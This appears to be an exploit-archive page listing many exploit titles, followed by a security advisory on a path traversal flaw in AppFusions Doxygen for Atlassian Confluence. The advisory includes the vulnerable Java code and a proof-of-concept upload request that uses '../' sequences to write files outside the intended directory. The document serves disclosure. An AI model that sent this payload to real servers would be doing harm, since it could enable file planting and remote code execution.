dab1517032
13 new exploits Borland Interbase 2007 - ibserver.exe Buffer Overflow (PoC) Borland Interbase 2007 - 'ibserver.exe' Buffer Overflow (PoC) Linux Kernel (Ubuntu / RedHat) - 'keyctl' Null Pointer Dereference Linux Kernel 4.8.0-22 / 3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference Microsoft Edge Scripting Engine - Memory Corruption (MS16-129) Microsoft Edge - 'CTextExtractor::GetBlockText' Out-of-Bounds Read (MS16-104) Microsoft Internet Explorer 8 jscript - 'RegExpBase::FBadHeader' Use-After-Free (MS15-018) NTP 4.2.8p8 - Denial of Service Tumbleweed SecureTransport FileTransfer - ActiveX Buffer Overflow Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow Borland Interbase 2007 - PWD_db_aliased Buffer Overflow (Metasploit) Borland Interbase 2007 - 'PWD_db_aliased' Buffer Overflow (Metasploit) Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow (Metasploit) Borland Interbase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow (Metasploit) Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow (Metasploit) Borland Interbase 2007 / 2007 SP2 - 'open_marker_file' Buffer Overflow (Metasploit) Borland Interbase 2007 / 2007 sp2 - 'jrd8_create_database' Buffer Overflow (Metasploit) Borland Interbase 2007 / 2007 SP2 - 'INET_connect' Buffer Overflow (Metasploit) Borland Interbase - isc_create_database() Buffer Overflow (Metasploit) Borland Interbase - 'isc_create_database()' Buffer Overflow (Metasploit) Borland Interbase - isc_attach_database() Buffer Overflow (Metasploit) Borland Interbase - 'isc_attach_database()' Buffer Overflow (Metasploit) Borland Interbase - SVC_attach() Buffer Overflow (Metasploit) Borland Interbase - 'SVC_attach()' Buffer Overflow (Metasploit) Borland Interbase - Create-Request Buffer Overflow (Metasploit) Borland Interbase - 'Create-Request' Buffer Overflow (Metasploit) Borland Interbase - PWD_db_aliased() Buffer Overflow (Metasploit) Borland Interbase - open_marker_file() Buffer Overflow (Metasploit) Borland Interbase - 'PWD_db_aliased()' Buffer Overflow (Metasploit) Borland Interbase - 'open_marker_file()' Buffer Overflow (Metasploit) Borland Interbase - jrd8_create_database() Buffer Overflow (Metasploit) Borland Interbase - INET_connect() Buffer Overflow (Metasploit) Borland Interbase - 'jrd8_create_database()' Buffer Overflow (Metasploit) Borland Interbase - 'INET_connect()' Buffer Overflow (Metasploit) Dlink DIR Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit) phpunity.postcard - (gallery_path) Remote File Inclusion phpunity.postcard - 'gallery_path' Parameter Remote File Inclusion CcMail 1.0.1 - (update.php functions_dir) Remote File Inclusion CcMail 1.0.1 - 'functions_dir' Parameter Remote File Inclusion 1024 CMS 0.7 - (download.php item) Remote File Disclosure 1024 CMS 0.7 - 'download.php' Remote File Disclosure cpCommerce 1.1.0 - (category.php id_category) SQL Injection CPCommerce 1.1.0 - 'id_category' Parameter SQL Injection 1024 CMS 1.3.1 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities 1024 CMS 1.3.1 - Local File Inclusion / SQL Injection Mole 2.1.0 - (viewsource.php) Remote File Disclosure ChartDirector 4.1 - (viewsource.php) File Disclosure 724CMS 4.01 Enterprise - (index.php ID) SQL Injection My Gaming Ladder 7.5 - (ladderid) SQL Injection Mole 2.1.0 - 'viewsource.php' Remote File Disclosure ChartDirector 4.1 - 'viewsource.php' File Disclosure 724CMS 4.01 Enterprise - 'index.php' SQL Injection My Gaming Ladder 7.5 - 'ladderid' Parameter SQL Injection exbb 0.22 - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities Pligg CMS 9.9.0 - (editlink.php id) SQL Injection ExBB 0.22 - Local / Remote File Inclusion Pligg CMS 9.9.0 - 'editlink.php' SQL Injection Prediction Football 1.x - (matchid) SQL Injection Prediction Football 1.x - 'matchid' Parameter SQL Injection Free Photo Gallery Site Script - (path) File Disclosure Free Photo Gallery Site Script - 'path' Parameter File Disclosure LiveCart 1.1.1 - (category id) Blind SQL Injection Ksemail - 'index.php language' Local File Inclusion LiveCart 1.1.1 - 'id' Parameter Blind SQL Injection Ksemail - Local File Inclusion RX Maxsoft - 'popup_img.php fotoID' SQL Injection PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection RX Maxsoft - 'fotoID' Parameter SQL Injection PHPKB Knowledge Base Software 1.5 - 'ID' Parameter SQL Injection Pollbooth 2.0 - (pollID) SQL Injection cpcommerce 1.1.0 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities Pollbooth 2.0 - 'pollID' Parameter SQL Injection CPCommerce 1.1.0 - Cross-Site Scripting / Local File Inclusion SmallBiz eShop - (content_id) SQL Injection SmallBiz eShop - 'content_id' Parameter SQL Injection lightneasy sqlite / no database 1.2.2 - Multiple Vulnerabilities LightNEasy sqlite / no database 1.2.2 - Multiple Vulnerabilities PostcardMentor - 'step1.asp cat_fldAuto' SQL Injection PostcardMentor - 'cat_fldAuto' Parameter SQL Injection Pligg CMS 9.9.0 - (story.php id) SQL Injection Pligg CMS 9.9.0 - 'story.php' SQL Injection LokiCMS 0.3.4 - writeconfig() Remote Command Execution LokiCMS 0.3.4 - 'writeconfig()' Remote Command Execution cpCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass CPCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass cpCommerce 1.2.8 - (id_document) Blind SQL Injection CPCommerce 1.2.8 - 'id_document' Parameter Blind SQL Injection cpCommerce 1.2.x - GLOBALS[prefix] Arbitrary File Inclusion CPCommerce 1.2.x - 'GLOBALS[prefix]' Arbitrary File Inclusion ChartDirector 5.0.1 - (cacheId) Arbitrary File Disclosure ChartDirector 5.0.1 - 'cacheId' Parameter Arbitrary File Disclosure Pligg CMS 1.0.4 - (story.php?id) SQL Injection Pligg CMS 1.0.4 - 'story.php' SQL Injection 724CMS 4.59 Enterprise - SQL Injection 724CMS Enterprise 4.59 - SQL Injection lightneasy 3.2.2 - Multiple Vulnerabilities LightNEasy 3.2.2 - Multiple Vulnerabilities My Postcards 6.0 - MagicCard.cgi Arbitrary File Disclosure My Postcards 6.0 - 'MagicCard.cgi' Arbitrary File Disclosure Mambo Open Source 4.0.14 - PollBooth.php Multiple SQL Injection Mambo Open Source 4.0.14 - 'PollBooth.php' Multiple SQL Injection PhotoKorn 1.53/1.54 - postcard.php id Parameter SQL Injection PhotoKorn 1.53/1.54 - 'id' Parameter SQL Injection CPCommerce 1.1 - Manufacturer.php SQL Injection CPCommerce 1.1 - 'manufacturer.php' SQL Injection LiveCart 1.0.1 - user/remindPassword return Parameter Cross-Site Scripting LiveCart 1.0.1 - category q Parameter Cross-Site Scripting LiveCart 1.0.1 - order return Parameter Cross-Site Scripting LiveCart 1.0.1 - user/remindComplete email Parameter Cross-Site Scripting LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting LiveCart 1.0.1 - 'q' Parameter Cross-Site Scripting LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting LiveCart 1.0.1 - 'email' Parameter Cross-Site Scripting Pligg CMS 1.x - module.php Multiple Parameter Cross-Site Scripting Pligg CMS 1.x - 'module.php' Multiple Parameter Cross-Site Scripting Pligg CMS 2.0.2 - (load_data_for_search.php) SQL Injection Pligg CMS 2.0.2 - 'load_data_for_search.php' SQL Injection CMS Made Simple 2.1.5 - Cross-Site Scripting Atlassian Confluence AppFusions Doxygen 1.3.0 - Directory Traversal WordPress Plugin Instagram Feed 1.4.6.2 - Cross-Site Request Forgery Mezzanine 4.2.0 - Cross-Site Scripting LEPTON 2.2.2 - SQL Injection LEPTON 2.2.2 - Remote Code Execution FUDforum 3.0.6 - Cross-Site Scripting / Cross-Site Request Forgery FUDforum 3.0.6 - Local File Inclusion Wordpress Plugin Olimometer 2.56 - SQL Injection
137 lines
4.9 KiB
Text
Executable file
137 lines
4.9 KiB
Text
Executable file
RCE Security Advisory
|
|
https://www.rcesecurity.com
|
|
|
|
|
|
1. ADVISORY INFORMATION
|
|
=======================
|
|
Product: AppFusions Doxygen for Atlassian Confluence
|
|
Vendor URL: www.appfusions.com
|
|
Type: Path Traversal [CWE-22]
|
|
Date found: 2016-06-23
|
|
Date published: -
|
|
CVSSv3 Score: 6.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)
|
|
CVE: -
|
|
|
|
|
|
2. CREDITS
|
|
==========
|
|
This vulnerability was discovered and researched by Julien Ahrens from
|
|
RCE Security.
|
|
|
|
|
|
3. VERSIONS AFFECTED
|
|
====================
|
|
AppFusions Doxygen for Atlassian Confluence v1.3.0
|
|
older versions may be affected too.
|
|
|
|
|
|
4. INTRODUCTION
|
|
===============
|
|
With Doxygen in Confluence, you can embed full-structure code documentation:
|
|
-Doxygen blueprint in Confluence to allow Doxygen archive imports
|
|
-Display documentation from annotated sources such as Java (i.e., JavaDoc),
|
|
C++, Objective-C, C#, C, PHP, Python, IDL (Corba, Microsoft, and
|
|
UNO/OpenOffice
|
|
flavors), Fortran, VHDL, Tcl, D in Confluence.
|
|
-Navigation supports code structure (classes, hierarchies, files), element
|
|
dependencies, inheritance and collaboration diagrams.
|
|
-Search documentation from within Confluence
|
|
-Restrict access to who can see/add what
|
|
-Doxygen in JIRA also available
|
|
|
|
(from the vendor's homepage)
|
|
|
|
|
|
5. VULNERABILITY DETAILS
|
|
========================
|
|
The application offers the functionality to import zipped Doxygen
|
|
documentations via a file upload to make them available within a
|
|
Confluence page. However the application does not properly validate the
|
|
"tempId" parameter, which represents the directory where the contents of
|
|
the uploaded file will be extracted and stored to. This leads to a path
|
|
traversal vulnerability when "/../" sequences are used as part of the
|
|
"tempId" parameter. Since the contents of the uploaded file are
|
|
extracted to the traversed directory, this vulnerability could also lead
|
|
to Remote Code Execution.
|
|
|
|
In DoxygenUploadServlet.java (lines 63-64) the "tempId" parameter is
|
|
read as part of a GET request to "/plugins/servlet/doxygen/upload" and
|
|
afterwards used in a "getTemporaryDirectory()" call:
|
|
|
|
String tempId = request.getParameter("tempId");
|
|
String destination =
|
|
this.doxygenManager.getTemporaryDirectory(tempId).getAbsolutePath();
|
|
|
|
The "getTemporaryDirectory()" function is defined in
|
|
DefaultDoxyGenManager.java (lines 38-41) and constructs a file object
|
|
based on the "java.io.tmpdir" variable, the static string
|
|
"/doxygen-temp/", the user-supplied "tempId" and a file separator in
|
|
between all parts:
|
|
|
|
public File getTemporaryDirectory(String tempId) {
|
|
File file = new File(System.getProperty("java.io.tmpdir") +
|
|
File.separator + "doxygen-temp" + File.separator + tempId);
|
|
return file;
|
|
}
|
|
|
|
In the subsequent code the uploaded file as represented by the "file"
|
|
HTTP POST parameter to "/plugins/servlet/doxygen/upload" is extracted to
|
|
the directory which was built using the "file" object.
|
|
|
|
The following Proof-of-Concept triggers this vulnerability by uploading
|
|
a zipped file, which will be extracted to "/home/confluence" by the
|
|
application:
|
|
|
|
POST
|
|
/plugins/servlet/doxygen/upload?tempId=/../../../../../../home/confluence
|
|
HTTP/1.1
|
|
Host: 127.0.0.1
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101
|
|
Firefox/46.0
|
|
Accept: application/json
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate, br
|
|
Cache-Control: no-cache
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Length: 966
|
|
Content-Type: multipart/form-data;
|
|
boundary=---------------------------62841490314755966452122422550
|
|
Cookie: doc-sidebar=300px; doxygen_width=256;
|
|
JSESSIONID=75A487B49F38A536358C728B1BE5A9E1
|
|
Connection: close
|
|
|
|
-----------------------------62841490314755966452122422550
|
|
Content-Disposition: form-data; name="file"; filename="Traversal.zip"
|
|
Content-Type: application/zip
|
|
|
|
[zipped data]
|
|
-----------------------------98001232218371736091795669059--
|
|
|
|
|
|
6. RISK
|
|
=======
|
|
To successfully exploit this vulnerability the attacker must be
|
|
authenticated and must have the rights within Atlassian Confluence to
|
|
upload Doxygen files (default).
|
|
|
|
The vulnerability allows remote attackers to upload arbitrary files to
|
|
any destination directory writeable by the user of the web server, which
|
|
could lead to Remote Code Execution.
|
|
|
|
|
|
7. SOLUTION
|
|
===========
|
|
Update to AppFusions Doxygen for Atlassian Confluence v1.3.4
|
|
|
|
|
|
8. REPORT TIMELINE (DD/MM/YYYY)
|
|
===============================
|
|
23/06/2016: Discovery of the vulnerability
|
|
23/06/2016: Notified vendor via public security mail address
|
|
29/06/2016: No response, sent out another notification w/o details
|
|
29/06/2016: Response from vendor who asked for full details
|
|
30/06/2016: Sent over preliminary advisory with full details
|
|
03/07/2016: No response from vendor, sent out a status request
|
|
03/07/2016: Vendor temporarily removes product from website
|
|
11/07/2016: Vendor releases v1.3.1 which fixes the issue
|
|
20/11/2016: Advisory released
|